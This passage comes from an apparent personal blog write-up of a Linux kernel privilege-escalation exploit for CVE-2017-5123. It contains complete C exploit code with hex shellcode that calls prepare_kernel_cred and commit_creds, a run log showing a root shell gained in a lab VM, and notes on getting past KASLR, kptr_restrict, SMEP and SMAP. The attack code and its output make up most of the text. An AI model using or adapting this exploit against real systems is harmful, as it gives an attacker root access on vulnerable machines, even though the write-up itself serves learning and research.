                        return (addr);
                }
        }
        fclose(f);
        printf("[!] Can't found socket by inode %d\n", sock_inode);
        return (0);

}

void    build_shellcode(unsigned long mem)
{
    char        shellcode[] = "\x48\x31\xd2\x48\x31\xff\x48\x31\xf6\x48\x31\xc9"
                      "\x48\x31\xc0\x48\xbb\x41\x41\x41\x41\x41\x41\x41"
                      "\x41\xff\xd3\x48\x89\xc7\x48\xb9\x42\x42\x42\x42"
                      "\x42\x42\x42\x42\xff\xd1\xc3";
    unsigned long   *sc0;
    unsigned long   *sc1;

    sc0 = (unsigned long*) &shellcode[17];
    sc1 = (unsigned long*) &shellcode[32];
    if ((*sc0 = get_kernel_sym("prepare_kernel_cred")) &&
        (*sc1 = get_kernel_sym("commit_creds")))
    {
        memcpy((void *)mem, shellcode, sizeof(shellcode));
        printf("[+] Shellcode modified and droped to %#lx\n", mem);
    }
    else
        exw(EXIT_FAILURE, "[!] Can't retrieve symbol!");
}

void    *map_memory(unsigned long target_map, size_t len)
{
    void    *addr;

    addr = mmap((void*)target_map, 4096 * ((len / 4096) + (len % 4096)), PROT_WRITE | PROT_EXEC | PROT_READ, MAP_ANON | MAP_FIXED | MAP_PRIVATE, -1, 0);
    if (addr != MAP_FAILED)
    {
        printf("[+] Successfully mapped memory at %#lx of size %#lx\n", target_map, 4096 * ((len / 4096) + (len % 4096)));
        return (addr);
    }
    else
        exw(EXIT_FAILURE, "[!] Failed to mmap memory\n");
    return (0);
}

void    exploit(unsigned long addr)
{
        pid_t           frk;
    siginfo_t       *infop;
    unsigned long   mapaddr;

    if ((frk = fork()) == -1)
                exw(EXIT_FAILURE, "[!] fork failed.");
        if (frk == 0)
            exit(0xde);
    else
    {
        mapaddr = getuid();
        mapaddr = mapaddr << (4 * 8);
        map_memory(mapaddr, frk);
        mapaddr |= frk;
        build_shellcode(mapaddr);
        printf("[+] Overwriting at %#lx with %#lx\n", addr, mapaddr);
        infop = (siginfo_t*)(addr - (24 - 8));
            waitid(P_PID, frk, infop, WEXITED | WSTOPPED | WCONTINUED);
    }
}

void    get_shell(void)
{
    char *ar[] = {"/bin/sh", NULL};

    if (getuid() != 0)
        exw(EXIT_FAILURE, "[!] Failed to get root.\n");
    printf("[+] Got root :) Enjoy ur shell\n");
    execve(ar[0], ar, NULL);
}

int main(void)
{
        int             sockfd;
        struct stat     statbuf;
        unsigned long   target_ptr;

        printf("[.] CVE-2017-5123 exploit by Phenol @BFF\n");

        sockfd = create_listening_tcp();
        fstat(sockfd, &statbuf);
        target_ptr = leak_sock_struct(statbuf.st_ino) + SOCKETSTRUCT_OFFSET;
    exploit(target_ptr);
    shutdown(sockfd, SHUT_RDWR);
    get_shell();
    return (0);
}
[phenol@Lab cve]$ gcc -static -Wall -Werror -Wextra -o cve20175123 CVE-2017-5123.c 

And now in our vm:

/ $ /share/cve20175123 
[.] CVE-2017-5123 exploit by Phenol @BFF
[+] Listening TCP sock on port 8888
[+] Found sock struct at 0xffff88001e304000
[+] Successfully mapped memory at 0x3e800000000 of size 0x3db000
[+] Found prepare_kernel_cred at 0xffffffff81077380
[+] Found commit_creds at 0xffffffff81077000
[+] Shellcode modified and droped to 0x3e8000003db
[+] Overwriting at 0xffff88001e304290 with 0x3e8000003db
[+] Got root :) Enjoy ur shell
/ # id
uid=0(root) gid=0
/ # 

IV) Limits of the exploit and conclusion

In order to understand the reliability of the exploit we need to know the common kernel protection mecanism. There are severals, we will just see the most common.

  • mmap_min_addr: this one set the minimal address that can be mapped, it's very effective into defeating the exploitation of null pointer dereferencement, and it's also the protection which make the hexpresso exploit useless, because nowaday all linux system come with a minimal mmap value of 4096.

  • KASLR: Like aslr in userland programs, KASLR stand for Kernel Address Space Layout Randomisation, it will randomize the base address of the kernel at each boot. So to get our interesting symbol like prepare_kernel_cred and commit_cred we must leaks in order to retrieve the base address.

  • kptr_restrict: This protection avoid leaking address from the kernelspace via the /proc filesystem. In our case when this protection is activated our exploit will fail to leaks the sock struct address and we won't be able to leaks the address of prepare_kernel_cred and commit_cred. The best way to circumvent this protection is to find a leak, for example we may find some address leaked in syslog or by exploiting an information leak in the kernel.

  • SMEP: Supervisor Mode Execution Prevention, this feature was introduced by Intel haswell microarchitecture. It's trig a trap if the kernel try to execute code located in userspace. This will totally fuck up my exploit. This can be bypassed by doing rop to clear the 20th bit in the CR4 register. Unfortunatly I haven't found a way to write 8 contigous bytes, so I can't rop or call native_cr4_write... You can check if you got smep enabled by issuing: cat /proc/cpuinfo | grep smep on my Intel i5 M520 I don't have it :(

  • SMAP: Like SMEP, SMAP stand for Supervisor Mode Access Prevention and will trig a trap whenever the kernel try to access userspace memory. This will also fuck up my exploit. It can be bypassed by clearing the 21th bit of the CR4 register.

So my exploit isn't so reliable, it will fail on system with kptr_restrict, SMEP/SMAP. My hardware is kindly old, I haven't SMEP and SMAP. Also by default archlinux kernel come without kptr_restrict, at my home this exploit is reliable but won't work on modern hardware with a properly configured and hardened kernel. But it was fun, and I'm still trying to figure out a way to bypass SMAP and SMEP (ROP) by being able to write 8 fully controlled contigous bytes...

Thank for reading, please if you find error/mistake or if you have improvement contact me!

Some very interesting resource which helped me:

Exploitation du kernel pour les NULL
Linux Kernel Modern exploitation
Linux Kernel x86-64 bypass SMEP - KASLR - kptr_restric

Comments !